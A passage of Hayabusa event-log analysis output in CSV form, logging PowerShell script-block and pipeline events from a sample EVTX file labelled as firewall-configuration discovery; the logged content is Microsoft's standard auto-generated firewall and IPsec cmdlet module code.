[string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallAddressFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 
'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query 
(cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 